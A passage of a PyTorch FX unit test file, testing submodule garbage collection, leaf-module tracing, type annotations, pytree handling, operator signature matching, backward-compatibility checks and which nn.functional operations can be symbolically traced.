a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'block_diag',
'broadcast_tensors',
'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'igamma',
'igammac',
'linalg.multi_dot',
'lu',
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
